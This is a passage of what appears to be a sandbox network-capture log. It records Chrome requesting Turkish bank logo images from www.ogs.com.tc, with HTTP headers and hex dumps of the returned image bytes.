7e 60 3e 94 ff dd fe 97 e0 2f f9 c7 f6 8f f9 5e b9 de c9 bd 20 3f 70 03 2d Data Ascii: RIFFWEBPVP8 R>I$F"!!5PgnvKO}wgn:t\|o__;H~p}?Rz?[}4adkX~P_?OSzG_\|GZXqi`^\|'M{OA?~`>/^ ?p-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49769	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	610	OUT	GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 4528 Last-Modified: Thu, 23 May 2024 21:37:19 GMT Connection: close ETag: "664fb70f-11b0" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	4528	IN	Data Raw: 52 49 46 46 a8 11 00 00 57 45 42 50 56 50 38 20 9c 11 00 00 30 5e 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 ea f4 54 28 04 84 b3 b7 70 bb 54 d8 ff ba 79 be 55 7f bb 7e 21 fe 73 cf f6 82 bd 2c f6 6f ef df 6b 3e ea fd 40 79 80 7e 94 ff 75 fc b1 ed 15 e6 03 f5 cb f6 bf b0 37 f6 ff 50 0f e8 1f d5 7a cb 3d 00 3f 68 3d 33 7f 64 7e 0c 7f 6c ff f0 7f 8c f8 09 fd 64 ff c3 9c 95 fe 43 b3 3f ee bf 92 dd 74 7e 01 f6 5b f6 e7 9f 4c 50 7e 3b f5 eb ee 9f d7 7f 66 7f 23 3e 1d ff 63 e0 9f 00 2f c5 bf 8d ff b2 fe 77 fd a7 fd af 03 c0 00 fa 91 ff 07 fb ff e3 7f a0 6f f9 3e 89 fc d5 7b 80 ff 28 fe 67 fe 63 fb 77 ee 6f f7 2f ff fe f4 9e 0d 14 00 fe 67 fd 33 fd 7f f8 ef 5c af f5 bf c9 ff 91 fd e0 f7 2b f5 07 fe 8f f3 bf 02 bf cf 7f b1 7f d6 fe f1 da 2f f7 6b d9 73 f6 Data Ascii: RIFFWEBPVP8 0^*>I$E!T(pTyU~!s,ok>@y~u7Pz=?h=3d~ldC?t~[LP~;f#>c/wo>{(gcwo/g3\+/ks

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49770	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	603	OUT	GET /assets/images/banks/isbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 4990 Last-Modified: Thu, 23 May 2024 21:37:16 GMT Connection: close ETag: "664fb70c-137e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	4990	IN	Data Raw: 52 49 46 46 76 13 00 00 57 45 42 50 56 50 38 20 6a 13 00 00 70 60 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 22 96 08 f8 50 09 09 65 6e fc 7c 99 ab eb 2d 3e 87 82 4b f5 ef e6 1f ba 3f d8 7d e4 2a 0f d8 3f aa fe c6 fe d7 ee 53 b2 b8 ba 7a ad ec df e6 7f a3 ff 83 fd ad f7 93 fe ef d8 77 e6 4f fa be e0 1f a8 5f ec bf b2 fa dd 7a 8b fd c0 f5 01 fd 17 fc e7 fd cf ee 3e ec 3f dc bf 5b 3d c1 fe ad ff d9 ff 11 fe 1b e4 03 f9 f7 f7 0f fd 1e cf 1f e1 bf ff fb 8d fe e1 7b 02 7f 39 ff 2d ff d3 d9 c3 fe 6f ed 7f c1 77 f6 4f f6 3f b7 3f 03 5f b2 7f f9 fd 80 3f ff fa 80 7f ff eb 17 ea 1f f4 4e d7 bf bc 7e 52 fa 0b e4 4f c6 fe d3 f2 9e e9 7f f6 5e 4a be bd 7d db fa 7f ee 37 e5 77 de 7f db 3f d6 fe 35 f9 b7 f0 d3 50 2f c6 3f 91 7f 77 fc b4 e1 a1 00 1f 93 7f 44 ff Data Ascii: RIFFvWEBPVP8 jp`>I$F"!"Pen\|->K?}?SzwO_z>?[={9-owO??_?N~RO^J}7w?5P/?wD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49771	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	592	OUT	GET /assets/images/1.png HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	281	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/png Content-Length: 2220 Last-Modified: Thu, 23 May 2024 21:37:05 GMT Connection: close ETag: "664fb701-8ac" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	2220	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a5 00 00 00 28 08 03 00 00 01 df dc fa 78 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 80 50 4c 54 45 ff ff ff fe fb fc fc dd de f8 ba bb f4 9e 9f f1 88 89 ef 78 79 ed 6f 6f ec 69 6a ec 64 65 f4 9b 9c fa d1 d1 fe f0 ef f1 85 86 eb 65 66 f3 94 95 f7 b4 b5 f9 c8 c9 fa cf d0 fa d2 d2 fa ca ca f7 b8 b8 f1 8c 8e e7 4d 4c e0 28 22 e8 53 53 ef 7c 7d e9 54 54 f5 a1 a2 fc d7 d7 fe f6 f6 e2 30 2c df 24 1b fe fc fc ff f9 f9 f6 af af e9 56 57 e7 4a 4a f2 90 92 fc dc dc e2 2e 29 f6 ab ac e6 48 48 fd f3 f2 f2 8e 8f e3 35 32 f8 c2 c3 e8 51 52 e4 37 35 f3 9c 9d fb d3 d4 e0 Data Ascii: PNGIHDR(xgAMAa cHRMz&u0`:pQ<PLTExyooijdeefML("SS\|}TT0,$VWJJ.)HH52QR75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49772	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	601	OUT	GET /assets/images/banks/fiba.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 36954 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-905a" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	16100	IN	Data Raw: ff d8 ff e1 09 7b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 33 3a 33 31 3a 31 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: {ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 03:31:15"
2024-05-25 22:17:18 UTC	16384	IN	Data Raw: 4a 20 11 53 6b 8a 84 dd 7a 88 11 b1 ae e7 43 a7 a0 f8 c0 a3 92 4e a4 ef a0 18 40 8a 4a b9 13 21 07 1d 98 26 b8 af 97 44 0a 49 b3 e4 77 a5 ef 25 f5 69 dc c5 53 60 8f 45 a3 26 4f 12 28 0b fa 87 48 a2 73 84 d0 f1 0e 78 62 9e e4 9f a8 a7 c3 9e 30 26 13 eb 79 2c de c4 98 b6 d4 16 f3 0e da a4 1a 6e 48 ba 5c 73 e5 b9 25 d5 23 de 1c 39 3b c8 88 ff 00 36 65 6c 95 5f 4b b7 fb 82 1e 3e 7e 55 23 e6 a4 ab bd 01 92 67 09 a9 8b c6 8a f8 07 22 8d b3 72 d1 cd ce 9a 3b ae ac 0a f3 bc ad 71 24 09 ee 10 05 17 67 e2 21 10 a9 21 ac 3c 95 0e 3b 44 e7 df 36 24 8a 96 eb 1d 07 2d 53 52 2f cb cb 78 4b e9 4b 19 26 5a e2 0b 7b 39 52 f0 e9 d7 1f 57 56 e8 21 d9 ce df 8a 3f 4b 9f c1 3d 51 5f 00 70 7f e2 8d ae 40 7e bb 3a 6e ab 4a 71 f5 39 25 43 89 30 64 ac 67 e2 8a 73 4b 76 ce 4a c3 d9 Data Ascii: J SkzCN@J!&DIw%iS`E&O(Hsxb0&y,nH\s%#9;6el_K>~U#g"r;q$g!!<;D6$-SR/xKK&Z{9RWV!?K=Q_p@~:nJq9%C0dgsKvJ
2024-05-25 22:17:18 UTC	4470	IN	Data Raw: 11 ce 73 90 6d 5e 2a e1 27 2b 06 8a aa 8c 62 bd ca ee c9 d9 3c 4e 55 f7 aa fe fd 7d ea 87 d3 36 76 2c 5e 6f 18 96 c7 94 38 d2 b4 71 e1 40 e6 d8 71 04 88 5d 05 20 fb 86 2c 0e 5e 83 14 48 8d 7a ab 05 7e 26 20 0e ad 94 81 3a b9 eb 18 b1 64 00 c7 8b 20 67 01 a0 58 42 99 0c cf 8d 32 0c e8 c6 60 26 c0 9f 06 50 9e 23 80 ad 61 42 56 39 8f 6a 39 15 3a 62 d6 68 ad a3 b5 9e 1e c1 21 fe 36 3b 91 3d cd 78 a7 36 42 2b 7e f7 74 ea 4d c4 1a 7c 45 dd d5 8e 2a fa 86 ba c2 fa aa 6b 45 5a 86 2c 09 b3 0c c8 35 b6 30 c1 32 54 b8 d0 7c a4 47 aa 31 1a ae f6 2f 7e 95 17 6f 55 9a 11 3b f6 1e 3b 23 47 4c 46 23 be 64 97 24 36 72 d7 b7 7f 7f 8f bf 48 ba 5e 45 db 5d ab bb 78 9b 2f 47 62 21 2f 7f 7a 28 20 9a 1c 75 4f f5 7b 74 c2 19 3c f2 fb 15 49 21 ce 90 5f c2 a5 32 bc 8a bf e5 e8 7d Data Ascii: sm^'+b<NU}6v,^o8q@q] ,^Hz~& :d gXB2`&P#aBV9j9:bh!6;=x6B+~tM\|EkEZ,502T\|G1/~oU;;#GLF#d$6rH^E]x/Gb!/z( uO{t<I!_2}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49773	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	603	OUT	GET /assets/images/banks/finans.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 6232 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-1858" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	6232	IN	Data Raw: 52 49 46 46 50 18 00 00 57 45 42 50 56 50 38 20 44 18 00 00 50 69 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 45 a2 a2 21 11 4c 04 c8 28 04 84 b2 b7 70 ba fd fa 6f e7 7b 4a ba df b4 f3 6d e4 9e cb fd 34 f7 ee 3c f2 90 e5 cf fa bf 76 ff 32 bf d3 7a b0 fb d4 f7 0e fd 49 f1 80 f7 8d e6 1b f6 df f6 cf dd bf fd ef ed 7f bc 1f ec be a0 9f ce bf df 75 a1 fa 08 79 6f 7e e9 fc 2f 7f 65 ff 9b fb 6b ed 39 ff ff 59 43 c8 5f d7 ff 17 7c 28 fe c5 f9 39 e8 2f 96 0f 23 7b 2f f9 35 d2 1f ab 3c cd fe 41 f5 eb ef 3f d7 bf 6a ff 33 3f 03 fd ca f8 8b c0 17 f1 5f e5 3f df 3f 2a 7f b9 7e e4 72 2a 00 4f ca 7f aa ff b7 f5 01 fa af 32 3e c7 7b 00 7f 2c fe 9d fe af ed d3 e7 5e fd 8a 01 ff 2a fe eb ff 47 fc 6f b0 df fb df ea 7f 33 bd a5 7d 3d ff 57 fc af c0 4f f2 af eb df f1 ff c0 fb 4b ff Data Ascii: RIFFPWEBPVP8 DPi>I$E!L(po{Jm4<v2zIuyo~/ek9YC_\|(9/#{/5<A?j3?_??~rO2>{,^Go3}=WOK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49774	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	368	OUT	GET /assets/images/banks/kuveyt.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 4050 Last-Modified: Thu, 23 May 2024 21:37:17 GMT Connection: close ETag: "664fb70d-fd2" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	4050	IN	Data Raw: 52 49 46 46 ca 0f 00 00 57 45 42 50 56 50 38 20 be 0f 00 00 f0 55 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 95 18 f0 50 09 09 65 6e e1 76 b1 1f d4 dd 7d 13 97 b5 7e 5a 7b 2a 55 3f a9 fe 10 f4 00 fb 00 e9 17 a1 3c b5 bc 4b f3 0f f3 5f dc 3f 28 fe 80 7f 6e fe 81 ec 93 f3 1f ea 4f c0 17 e9 47 f8 ef ee 9e b6 9e a5 3c c0 7f 39 fe cf ff 17 fc 77 ba d7 f8 af d4 df 71 7f b2 1e c0 1f d1 7f c1 ff da f5 8a f6 11 ff 01 ff 5b d8 03 f6 3b ff ff b2 af fb 6f d9 6f 82 6f da bf db 9f 81 1f e7 5f e0 3f ea 7e 7f f7 00 75 13 f4 6b fb 97 6a 3f db ff 24 fa e5 7c d5 ec 67 30 27 a2 fa ef f9 df cc af 61 ff c2 fe 45 79 bf c0 0b d5 ff e0 b7 b4 40 07 e4 ff cf bf d7 7d aa fa 38 7f 2b e8 77 88 07 ea ef fa 7e 35 af 42 f6 03 fe 6f fd cb f5 bb d8 63 fc 9f 2d 7f 4f fe cd fc 09 Data Ascii: RIFFWEBPVP8 U>I$F"!!Penv}~Z{U?<K_?(nOG<9wq[;ooo_?~ukj?$\|g0'aEy@}8+w~5Boc-O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	365	OUT	GET /assets/images/banks/teb.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 22502 Last-Modified: Thu, 23 May 2024 21:37:19 GMT Connection: close ETag: "664fb70f-57e6" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	16100	IN	Data Raw: ff d8 ff e1 07 53 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 37 20 31 39 3a 35 39 3a 35 38 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: SExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:27 19:59:58"
2024-05-25 22:17:19 UTC	6402	IN	Data Raw: dc 48 ed 8a 1c b2 b7 94 69 b9 7b 9a f0 86 c5 6a 8a ea 19 78 aa c5 1f e2 5d 2a 76 8b c4 b5 4b 6d 78 29 93 30 94 bc ab 12 39 a9 1c 8f 4a a7 b9 99 74 aa 43 41 2a c0 b0 16 42 5d 5b 46 ff 00 15 0d 15 a9 a0 3b c5 c0 90 90 55 20 6a 29 b3 0a 75 35 56 85 a8 29 2a 4e 12 95 24 90 53 84 ca 58 48 29 29 fc 24 61 20 11 28 be 28 b2 8c ae 9d 6f 66 15 0e 25 b6 d0 80 54 a5 29 6a 09 48 00 5a 49 51 01 20 5a a5 10 91 69 11 cc 34 39 9b ac 35 93 e5 25 29 ab ad 2a 22 99 b7 0a 12 a2 ca 16 a4 85 3a f9 51 08 6d 96 d0 a7 56 48 5a 5b 2d 85 29 2e 21 87 71 b4 09 00 ca 53 1a e5 33 da 7a 89 16 c5 f1 7c 5f 19 4b c0 da 9a 86 cf f7 d3 1c 9e e6 ba 34 fe d2 ba 4b 9c de fd 11 49 fc f5 30 8c c1 33 ff 00 19 67 7a 89 80 a0 7f 3e b0 75 83 71 1a 44 72 c5 0e 59 cd b5 14 1f 31 72 4c c1 b6 96 a6 dd 52 Data Ascii: Hi{jx]vKmx)09JtCAB][F;U j)u5V)N$SXH))$a ((of%T)jHZIQ Zi495%)":QmVHZ[-).!qS3z\|_K4KI03gz>uqDrY1rLR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49775	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:18 UTC	365	OUT	GET /assets/images/banks/ing.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:18 GMT Content-Type: image/jpeg Content-Length: 52012 Last-Modified: Thu, 23 May 2024 21:37:16 GMT Connection: close ETag: "664fb70c-cb2c" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	16100	IN	Data Raw: ff d8 ff e1 0c 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 34 38 3a 33 36 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:48:36"
2024-05-25 22:17:19 UTC	16384	IN	Data Raw: 38 e2 82 e2 84 ca 12 5d d0 f0 61 11 3d d1 b6 9a d8 98 9e d4 a7 48 d1 b5 eb d4 27 b2 ea 80 12 5b 60 90 08 82 4c cd 8e e4 c8 ba 5c 0a 02 92 97 00 24 ff 00 ca ed 76 2c 21 85 f1 ce 51 5f 1d 4c f2 e3 db 84 6a aa 3a 17 99 40 d3 98 15 4a 6f 44 a2 b6 e9 fe 25 c1 d6 a0 68 69 9c 96 dd d9 36 6b cb f7 a0 ee 1e db 09 5f 59 db a3 89 05 f2 2f 2d 7a ce d9 a9 cd 08 14 71 27 64 59 b4 5f 1a 0e 45 02 1e e8 cb cc 68 85 a9 14 c6 12 da 9b f3 c8 5b 55 4e 02 95 52 b4 aa 20 5d 5e 85 d4 8f 25 75 66 91 a3 11 ea bf 3c 04 f4 ea 6b 12 bd a9 72 ad 15 d7 1f 44 7d 21 2a 0e 55 23 13 b7 96 3f ef 6e e5 cb 37 07 66 62 16 aa 1b a6 60 d5 94 dd 34 8f 1d 68 a1 d6 28 4d 52 b9 4c 11 0d 0f 73 a5 3f b1 f0 95 ec 91 46 dc f1 c7 3c 3c 62 99 cd 08 5e b1 22 5b 7c 3a b7 82 b2 0d a6 9f ed ea 53 ae 3a f6 29 Data Ascii: 8]a=H'[`L\$v,!Q_Lj:@JoD%hi6k_Y/-zq'dY_Eh[UNR ]^%uf<krD}!*U#?n7fb`4h(MRLs?F<<b^"[\|:S:)
2024-05-25 22:17:19 UTC	16384	IN	Data Raw: 98 64 47 44 62 bd d0 bb 66 4b d0 ea 7b c1 ea 49 62 c4 72 43 29 af f0 d3 a5 81 fe 1e 1a 32 91 47 61 91 51 d4 99 51 62 0a 90 64 50 07 1a 7e 87 b5 f4 98 6b b8 a9 4a 93 4a 42 0b 36 93 4f 80 57 ab f1 32 00 a6 79 21 87 11 8e 03 28 66 38 00 78 ed 6e fd db 75 d6 c7 62 f5 2d 52 ee 8f ac 4f 24 44 be 9b 6a 0b 8d 5a 1d 40 c9 16 67 8a bb b2 b0 26 40 6b 98 d5 7a 9d 39 24 46 0d 0d 86 db d6 bb 49 62 91 86 c5 69 a3 9d b5 13 33 29 0f 26 72 b2 54 b1 04 84 f4 cd 77 ca 86 13 9b 13 20 c5 ad 5e 8f 6c b6 99 b7 7e 25 4b c1 a6 69 f2 c9 84 b2 80 bd 5f 84 a9 19 2a b9 57 19 65 08 a3 05 05 8b 39 50 da 78 de 5b 72 b6 a7 45 e1 0f 56 c8 0f 0d 98 e3 90 66 56 86 70 23 9e 35 6c 43 18 9f dc 27 0e a4 58 8c 38 36 e4 d4 77 14 95 0b 72 88 d9 80 27 ac 8c eb 50 39 c0 7f 2b 11 e6 4f 1b bf 44 d3 36 Data Ascii: dGDbfK{IbrC)2GaQQbdP~kJJB6OW2y!(f8xnub-RO$DjZ@g&@kz9$FIbi3)&rTw ^l~%Ki_*We9Px[rEVfVp#5lC'X86wr'P9+OD6
2024-05-25 22:17:19 UTC	3144	IN	Data Raw: ab 48 b5 50 f1 bc 37 a1 7e 4e f9 46 60 3f 32 d9 df 67 a6 e6 f0 59 e8 af 7b 9a 8b 61 a5 da dc 40 81 1d 3c 7e 66 92 df d5 e2 bf 1e db fb 3d b3 cc 2a 8e 4b de 79 0f 4b b6 78 18 f2 9d b5 58 6e 81 9f d3 d8 fa 43 1b 5c 42 91 61 56 3d 11 ad 45 57 2f c9 13 e7 f1 57 7d 43 67 5f 75 47 77 5d 0a de 9a e6 a6 64 7b 1a bb 6a 9b 28 c2 9b 5d 67 5b 61 10 86 8b 3a be 7c 33 30 a1 30 9e e1 94 6f 47 35 55 15 17 ee b2 c6 97 f2 5c 27 bb 0e 67 4f 31 bc 6b ab 49 03 83 12 de 1a 10 d6 05 e5 7d 24 d0 c2 59 96 18 2b b9 a5 23 e2 c8 46 1a 4e 7e c0 ee 99 15 84 11 67 c3 9d b6 e3 5d 8f 19 77 cf 7a 77 3a be 97 9a d9 63 f4 31 db 1e ce 9a da 27 95 ca d5 70 88 68 93 a0 4d 8c 51 c9 87 32 31 4d 0e 7c 33 0a 4c 62 94 05 19 1d ae fd ed 3a b7 f7 07 8f fd bb 7f 6f fd f3 1b 0b 6f cd 37 d5 ae 83 6d 59 Data Ascii: 